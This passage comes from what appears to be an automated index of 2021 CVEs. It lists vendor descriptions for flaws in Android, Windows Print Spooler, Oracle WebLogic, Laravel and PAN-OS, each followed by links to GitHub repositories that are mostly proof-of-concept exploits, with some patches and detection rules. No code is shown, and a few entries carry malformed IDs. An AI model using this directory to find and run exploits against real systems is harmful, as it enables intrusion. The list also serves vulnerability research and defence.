In onCreate of DevicePickerFragment.java, there is a possible way to trick the user to select an unwanted bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11 Android-8.1 Android-9 Android-10. Android ID: A-182584940

- [nanopathi/packages_apps_Settings_CVE-2021-0586](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0586)

### CVE-2021-0589 (2021-07-14)

In BTM_TryAllocateSCN of btm_scn.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11 Android-8.1 Android-9 Android-10. Android ID: A-180939982

- [Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589)
- [Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589)

### CVE-2021-0594 (2021-07-14)

In onCreate of ConfirmConnectActivity, there is a possible remote bypass of user consent due to improper input validation. This could lead to remote (proximal, NFC) escalation of privilege allowing an attacker to deceive a user into allowing a Bluetooth connection with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11 Android-8.1 Android-9 Android-10. Android ID: A-176445224

- [Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594](https://github.com/Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594)

### CVE-2021-0595 (2021-10-06)

In lockAllProfileTasks of RootWindowContainer.java, there is a possible way to access the work profile without the profile PIN, after logging in. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9 Android-10 Android-11 Android-8.1. Android ID: A-177457096

- [pazhanivel07/Settings-CVE-2021-0595](https://github.com/pazhanivel07/Settings-CVE-2021-0595)
- [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595)

### CVE-2021-0600 (2021-07-14)

In onCreate of DeviceAdminAdd.java, there is a possible way to mislead a user to activate a device admin app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-8.1 Android-9 Android-10 Android-11. Android ID: A-179042963

- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600)

### CVE-2021-0640 (2021-08-17)

In noteAtomLogged of StatsdStats.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-9. Android ID: A-187957589

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640)

### CVE-2021-0652 (2021-10-22)

In VectorDrawable::VectorDrawable of VectorDrawable.java, there is a possible way to introduce a memory corruption due to sharing of not thread-safe objects. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.1 Android-9 Android-10 Android-11. Android ID: A-185178568

- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652)

### CVE-2021-0683 (2021-10-06)

In runTraceIpcStop of ActivityManagerShellCommand.java, there is a possible deletion of system files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11 Android-8.1 Android-9 Android-10. Android ID: A-185398942

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708)

### CVE-2021-0688 (2021-10-06)

In lockNow of PhoneWindowManager.java, there is a possible lock screen bypass due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-8.1 Android-9. Android ID: A-161149543

- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688)

### CVE-2021-0705 (2021-10-22)

In sanitizeSbn of NotificationManagerService.java, there is a possible way to keep service running in foreground and keep granted permissions due to Bypass of Background Service Restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11 Android-10. Android ID: A-185388103

- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705)

### CVE-2021-0928 (2021-12-15)

In createFromParcel of OutputConfiguration.java, there is a possible parcel serialization/deserialization mismatch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-9. Android ID: A-188675581

- [michalbednarski/ReparcelBug2](https://github.com/michalbednarski/ReparcelBug2)

### CVE-2021-0954 (2021-12-15)

In ResolverActivity, there is a possible user interaction bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10 Android-11. Android ID: A-143559931

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0954](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0954)

### CVE-2021-0963 (2021-12-15)

In onCreate of KeyChainActivity.java, there is a possible way to use an app certificate stored in keychain due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-9. Android ID: A-199754277

- [Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963](https://github.com/Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963)

### CVE-2021-22
- [LingerANR/CVE-2021-22-555](https://github.com/LingerANR/CVE-2021-22-555)

### CVE-2021-403
- [rhysmcneill/CVE-2021-403](https://github.com/rhysmcneill/CVE-2021-403)

### CVE-2021-521
- [NagendraPittu/CVE-2021-521-Exploit](https://github.com/NagendraPittu/CVE-2021-521-Exploit)

### CVE-2021-1056 (2021-01-08)

NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.

- [pokerfaceSad/CVE-2021-1056](https://github.com/pokerfaceSad/CVE-2021-1056)

### CVE-2021-1366 (2021-02-17)

A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack on an affected device if the VPN Posture (HostScan) Module is installed on the AnyConnect client. This vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges. To exploit this vulnerability, the attacker needs valid credentials on the Windows system.

- [koztkozt/CVE-2021-1366](https://github.com/koztkozt/CVE-2021-1366)

### CVE-2021-1480 (2021-04-08)

Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or allow an authenticated, local attacker to gain escalated privileges on an affected system. For more information about these vulnerabilities, see the Details section of this advisory.

- [xmco/sdwan-cve-2021-1480](https://github.com/xmco/sdwan-cve-2021-1480)

### CVE-2021-1497 (2021-05-06)

Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.

- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack)

### CVE-2021-1585 (2021-07-08)

A vulnerability in the Cisco Adaptive Security Device Manager (ASDM) Launcher could allow an unauthenticated, remote attacker to execute arbitrary code on a user's operating system. This vulnerability is due to a lack of proper signature verification for specific code exchanged between the ASDM and the Launcher. An attacker could exploit this vulnerability by leveraging a man-in-the-middle position on the network to intercept the traffic between the Launcher and the ASDM and then inject arbitrary code. A successful exploit could allow the attacker to execute arbitrary code on the user's operating system with the level of privileges assigned to the ASDM Launcher. A successful exploit may require the attacker to perform a social engineering attack to persuade the user to initiate communication from the Launcher to the ASDM.

- [jbaines-r7/staystaystay](https://github.com/jbaines-r7/staystaystay)

### CVE-2021-1636 (2021-01-12)

Microsoft SQL Elevation of Privilege Vulnerability

- [Nate0634034090/bug-free-memory](https://github.com/Nate0634034090/bug-free-memory)

### CVE-2021-1647 (2021-01-12)

Microsoft Defender Remote Code Execution Vulnerability

- [findcool/cve-2021-1647](https://github.com/findcool/cve-2021-1647)

### CVE-2021-1656 (2021-01-12)

TPM Device Driver Information Disclosure Vulnerability

- [waleedassar/CVE-2021-1656](https://github.com/waleedassar/CVE-2021-1656)

### CVE-2021-1675 (2021-06-08)

Windows Print Spooler Remote Code Execution Vulnerability

- [yu2u/CVE-2021-1675](https://github.com/yu2u/CVE-2021-1675)
- [cube0x0/CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675)
- [LaresLLC/CVE-2021-1675](https://github.com/LaresLLC/CVE-2021-1675)
- [kondah/patch-cve-2021-1675](https://github.com/kondah/patch-cve-2021-1675)
- [evilashz/CVE-2021-1675-LPE-EXP](https://github.com/evilashz/CVE-2021-1675-LPE-EXP)
- [hlldz/CVE-2021-1675-LPE](https://github.com/hlldz/CVE-2021-1675-LPE)
- [puckiestyle/CVE-2021-1675](https://github.com/puckiestyle/CVE-2021-1675)
- [cybersecurityworks553/CVE-2021-1675_PrintNightMare](https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare)
- [tanarchytan/CVE-2021-1675](https://github.com/tanarchytan/CVE-2021-1675)
- [calebstewart/CVE-2021-1675](https://github.com/calebstewart/CVE-2021-1675)
- [Leonidus0x10/CVE-2021-1675-SCANNER](https://github.com/Leonidus0x10/CVE-2021-1675-SCANNER)
- [thomasgeens/CVE-2021-1675](https://github.com/thomasgeens/CVE-2021-1675)
- [mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery](https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery)
- [killtr0/CVE-2021-1675-PrintNightmare](https://github.com/killtr0/CVE-2021-1675-PrintNightmare)
- [corelight/CVE-2021-1675](https://github.com/corelight/CVE-2021-1675)
- [kougyokugentou/CVE-2021-1675](https://github.com/kougyokugentou/CVE-2021-1675)
- [ptter23/CVE-2021-1675](https://github.com/ptter23/CVE-2021-1675)
- [initconf/cve-2021-1675-printnightmare](https://github.com/initconf/cve-2021-1675-printnightmare)
- [ozergoker/PrintNightmare](https://github.com/ozergoker/PrintNightmare)
- [exploitblizzard/PrintNightmare-CVE-2021-1675](https://github.com/exploitblizzard/PrintNightmare-CVE-2021-1675)
- [edsonjt81/CVE-2021-1675](https://github.com/edsonjt81/CVE-2021-1675)
- [sailay1996/PrintNightmare-LPE](https://github.com/sailay1996/PrintNightmare-LPE)
- [JumpsecLabs/PrintNightmare](https://github.com/JumpsecLabs/PrintNightmare)
- [bartimusprimed/CVE-2021-1675-Yara](https://github.com/bartimusprimed/CVE-2021-1675-Yara)
- [k8gege/cve-2021-1675](https://github.com/k8gege/cve-2021-1675)
- [galoget/PrintNightmare-CVE-2021-1675-CVE-2021-34527](https://github.com/galoget/PrintNightmare-CVE-2021-1675-CVE-2021-34527)
- [thalpius/Microsoft-CVE-2021-1675](https://github.com/thalpius/Microsoft-CVE-2021-1675)
- [zha0/Microsoft-CVE-2021-1675](https://github.com/zha0/Microsoft-CVE-2021-1675)
- [Winter3un/CVE-2021-1675](https://github.com/Winter3un/CVE-2021-1675)
- [hahaleyile/my-CVE-2021-1675](https://github.com/hahaleyile/my-CVE-2021-1675)
- [mstxq17/CVE-2021-1675_RDL_LPE](https://github.com/mstxq17/CVE-2021-1675_RDL_LPE)
- [ly4k/PrintNightmare](https://github.com/ly4k/PrintNightmare)
- [Wra7h/SharpPN](https://github.com/Wra7h/SharpPN)
- [OppressionBreedsResistance/CVE-2021-1675-PrintNightmare](https://github.com/OppressionBreedsResistance/CVE-2021-1675-PrintNightmare)
- [eversinc33/NimNightmare](https://github.com/eversinc33/NimNightmare)
- [AndrewTrube/CVE-2021-1675](https://github.com/AndrewTrube/CVE-2021-1675)
- [TheJoyOfHacking/cube0x0-CVE-2021-1675](https://github.com/TheJoyOfHacking/cube0x0-CVE-2021-1675)
- [TheJoyOfHacking/calebstewart-CVE-2021-1675](https://github.com/TheJoyOfHacking/calebstewart-CVE-2021-1675)
- [jj4152/cve-2021-1675](https://github.com/jj4152/cve-2021-1675)
- [r1skkam/PrintNightmare](https://github.com/r1skkam/PrintNightmare)
- [peckre/PNCVE-Win10-20H2-Exploit](https://github.com/peckre/PNCVE-Win10-20H2-Exploit)
- [whoami-chmod777/CVE-2021-1675-CVE-2021-34527](https://github.com/whoami-chmod777/CVE-2021-1675-CVE-2021-34527)
- [whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-](https://github.com/whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-)
- [0xSs0rZ/Windows_Exploit](https://github.com/0xSs0rZ/Windows_Exploit)

### CVE-2021-1678 (2021-01-12)

Windows Print Spooler Spoofing Vulnerability

- [alvaciroliveira/RpcAuthnLevelPrivacyEnabled](https://github.com/alvaciroliveira/RpcAuthnLevelPrivacyEnabled)

### CVE-2021-1699 (2021-01-12)

Windows (modem.sys) Information Disclosure Vulnerability

- [waleedassar/CVE-2021-1699](https://github.com/waleedassar/CVE-2021-1699)

### CVE-2021-1732 (2021-02-25)

Windows Win32k Elevation of Privilege Vulnerability

- [KaLendsi/CVE-2021-1732-Exploit](https://github.com/KaLendsi/CVE-2021-1732-Exploit)
- [k-k-k-k-k/CVE-2021-1732](https://github.com/k-k-k-k-k/CVE-2021-1732)
- [oneoy/CVE-2021-1732-Exploit](https://github.com/oneoy/CVE-2021-1732-Exploit)
- [linuxdy/CVE-2021-1732_exp](https://github.com/linuxdy/CVE-2021-1732_exp)
- [Pai-Po/CVE-2021-1732](https://github.com/Pai-Po/CVE-2021-1732)
- [exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732](https://github.com/exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732)
- [BeneficialCode/CVE-2021-1732](https://github.com/BeneficialCode/CVE-2021-1732)
- [ExploitCN/CVE-2021-1732-EXP-](https://github.com/ExploitCN/CVE-2021-1732-EXP-)
- [r1l4-i3pur1l4/CVE-2021-1732](https://github.com/r1l4-i3pur1l4/CVE-2021-1732)
- [fenalik/CVE-2021-1732](https://github.com/fenalik/CVE-2021-1732)
- [4dp/CVE-2021-1732](https://github.com/4dp/CVE-2021-1732)
- [yangshifan-git/CVE-2021-1732](https://github.com/yangshifan-git/CVE-2021-1732)
- [asepsaepdin/CVE-2021-1732](https://github.com/asepsaepdin/CVE-2021-1732)

### CVE-2021-1748 (2021-04-02)

A validation issue was addressed with improved input sanitization. This issue is fixed in tvOS 14.4, watchOS 7.3, iOS 14.4 and iPadOS 14.4. Processing a maliciously crafted URL may lead to arbitrary javascript code execution.

- [Ivanhoe76zzzz/itmsBlock](https://github.com/Ivanhoe76zzzz/itmsBlock)
- [ChiChou/mistune-patch-backport](https://github.com/ChiChou/mistune-patch-backport)

### CVE-2021-1782 (2021-04-02)

A race condition was addressed with improved locking. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS 7.3, tvOS 14.4, iOS 14.4 and iPadOS 14.4. A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.

- [raymontag/cve-2021-1782](https://github.com/raymontag/cve-2021-1782)
- [synacktiv/CVE-2021-1782](https://github.com/synacktiv/CVE-2021-1782)

### CVE-2021-1883 (2021-09-08)

This issue was addressed with improved checks. This issue is fixed in Security Update 2021-004 Mojave, iOS 14.5 and iPadOS 14.5, watchOS 7.4, Security Update 2021-003 Catalina, tvOS 14.5, macOS Big Sur 11.3. Processing maliciously crafted server messages may lead to heap corruption.

- [gabe-k/CVE-2021-1883](https://github.com/gabe-k/CVE-2021-1883)

### CVE-2021-1905 (2021-05-07)

Possible use after free due to improper handling of memory mapping of multiple processes simultaneously in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables

- [TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664](https://github.com/TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664)

### CVE-2021-1961 (2021-09-09)

Possible buffer overflow due to lack of offset length check while updating the buffer value in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables

- [tamirzb/CVE-2021-1961](https://github.com/tamirzb/CVE-2021-1961)

### CVE-2021-1965 (2021-07-13)

Possible buffer overflow due to lack of parameter length check during MBSSID scan IE parse in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking

- [parsdefense/CVE-2021-1965](https://github.com/parsdefense/CVE-2021-1965)
- [foxtrot/CVE-2021-1965](https://github.com/foxtrot/CVE-2021-1965)

### CVE-2021-1994 (2021-01-20)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021)

### CVE-2021-2021 (2021-01-20)

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

- [TheCryingGame/CVE-2021-2021good](https://github.com/TheCryingGame/CVE-2021-2021good)

### CVE-2021-2109 (2021-01-20)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

- [Al1ex/CVE-2021-2109](https://github.com/Al1ex/CVE-2021-2109)
- [rabbitsafe/CVE-2021-2109](https://github.com/rabbitsafe/CVE-2021-2109)
- [yuaneuro/CVE-2021-2109_poc](https://github.com/yuaneuro/CVE-2021-2109_poc)
- [dinosn/CVE-2021-2109](https://github.com/dinosn/CVE-2021-2109)
- [lnwza0x0a/CVE-2021-2109](https://github.com/lnwza0x0a/CVE-2021-2109)
- [Vulnmachines/oracle-weblogic-CVE-2021-2109](https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109)

### CVE-2021-2119 (2021-01-20)

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).

- [Sauercloud/RWCTF21-VirtualBox-61-escape](https://github.com/Sauercloud/RWCTF21-VirtualBox-61-escape)
- [chatbottesisgmailh/Sauercloude](https://github.com/chatbottesisgmailh/Sauercloude)
- [shi10587s/Sauercloude](https://github.com/shi10587s/Sauercloude)

### CVE-2021-2173 (2021-04-22)

Vulnerability in the Recovery component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having DBA Level Account privilege with network access via Oracle Net to compromise Recovery. While the vulnerability is in Recovery, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Recovery accessible data. CVSS 3.1 Base Score 4.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N).

- [emad-almousa/CVE-2021-2173](https://github.com/emad-almousa/CVE-2021-2173)

### CVE-2021-2175 (2021-04-22)

Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).

- [emad-almousa/CVE-2021-2175](https://github.com/emad-almousa/CVE-2021-2175)

### CVE-2021-2302 (2021-04-22)

Vulnerability in the Oracle Platform Security for Java product of Oracle Fusion Middleware (component: OPSS). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Platform Security for Java. Successful attacks of this vulnerability can result in takeover of Oracle Platform Security for Java. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [quynhle7821/CVE-2021-2302](https://github.com/quynhle7821/CVE-2021-2302)

### CVE-2021-2394 (2021-07-20)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [lz2y/CVE-2021-2394](https://github.com/lz2y/CVE-2021-2394)
- [freeide/CVE-2021-2394](https://github.com/freeide/CVE-2021-2394)
- [BabyTeam1024/CVE-2021-2394](https://github.com/BabyTeam1024/CVE-2021-2394)
- [fasanhlieu/CVE-2021-2394](https://github.com/fasanhlieu/CVE-2021-2394)

### CVE-2021-2456 (2021-07-20)

Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [peterjson31337/CVE-2021-2456](https://github.com/peterjson31337/CVE-2021-2456)

### CVE-2021-2471 (2021-10-20)

Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H).

- [SecCoder-Security-Lab/jdbc-sqlxml-xxe](https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe)
- [cckuailong/CVE-2021-2471](https://github.com/cckuailong/CVE-2021-2471)
- [DrunkenShells/CVE-2021-2471](https://github.com/DrunkenShells/CVE-2021-2471)

### CVE-2021-3007 (2021-01-04)

Laminas Project laminas-http before 2.14.2, and Zend Framework 3.0.0, has a deserialization vulnerability that can lead to remote code execution if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php. NOTE: Zend Framework is no longer supported by the maintainer. NOTE: the laminas-http vendor considers this a "vulnerability in the PHP language itself" but has added certain type checking as a way to prevent exploitation in (unrecommended) use cases where attacker-supplied data can be deserialized

- [Vulnmachines/ZF3_CVE-2021-3007](https://github.com/Vulnmachines/ZF3_CVE-2021-3007)

### CVE-2021-3019 (2021-01-05)

ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.

- [B1anda0/CVE-2021-3019](https://github.com/B1anda0/CVE-2021-3019)
- [0xf4n9x/CVE-2021-3019](https://github.com/0xf4n9x/CVE-2021-3019)
- [Maksim-venus/CVE-2021-3019](https://github.com/Maksim-venus/CVE-2021-3019)
- [murataydemir/CVE-2021-3019](https://github.com/murataydemir/CVE-2021-3019)
- [Aoyuh/cve-2021-3019](https://github.com/Aoyuh/cve-2021-3019)
- [givemefivw/CVE-2021-3019](https://github.com/givemefivw/CVE-2021-3019)
- [qiezi-maozi/CVE-2021-3019-Lanproxy](https://github.com/qiezi-maozi/CVE-2021-3019-Lanproxy)
- [a1665454764/CVE-2021-3019](https://github.com/a1665454764/CVE-2021-3019)

### CVE-2021-3060 (2021-11-10)

An OS command injection vulnerability in the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS software allows an unauthenticated network-based attacker with specific knowledge of the firewall configuration to execute arbitrary code with root user privileges. The attacker must have network access to the GlobalProtect interfaces to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers with Prisma Access 2.1 Preferred and Prisma Access 2.1 Innovation firewalls are impacted by this issue.

- [timb-machine-mirrors/rqu1-cve-2021-3060.py](https://github.com/timb-machine-mirrors/rqu1-cve-2021-3060.py)
- [anmolksachan/CVE-2021-3060](https://github.com/anmolksachan/CVE-2021-3060)

### CVE-2021-3064 (2021-11-10)

A memory corruption vulnerability exists in Palo Alto Networks GlobalProtect portal and gateway interfaces that enables an unauthenticated network-based attacker to disrupt system processes and potentially execute arbitrary code with root privileges. The attacker must have network access to the GlobalProtect interface to exploit this issue. This issue impacts PAN-OS 8.1 versions earlier than PAN-OS 8.1.17. Prisma Access customers are not impacted by this issue.

- [0xhaggis/CVE-2021-3064](https://github.com/0xhaggis/CVE-2021-3064)

### CVE-2021-3122 (2021-02-07)

CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration."

- [acquiredsecurity/CVE-2021-3122-Details](https://github.com/acquiredsecurity/CVE-2021-3122-Details)

### CVE-2021-3129 (2021-01-12)

Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.

- [ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
- [SNCKER/CVE-2021-3129](https://github.com/SNCKER/CVE-2021-3129)
- [SecPros-Team/laravel-CVE-2021-3129-EXP](https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP)
- [crisprss/Laravel_CVE-2021-3129_EXP](https://github.com/crisprss/Laravel_CVE-2021-3129_EXP)
- [nth347/CVE-2021-3129_exploit](https://github.com/nth347/CVE-2021-3129_exploit)
- [FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129](https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129)
- [zhzyker/CVE-2021-3129](https://github.com/zhzyker/CVE-2021-3129)
- [Y0s9/CVE-2021-3129](https://github.com/Y0s9/CVE-2021-3129)
- [idea-oss/laravel-CVE-2021-3129-EXP](https://github.com/idea-oss/laravel-CVE-2021-3129-EXP)
- [knqyf263/CVE-2021-3129](https://github.com/knqyf263/CVE-2021-3129)
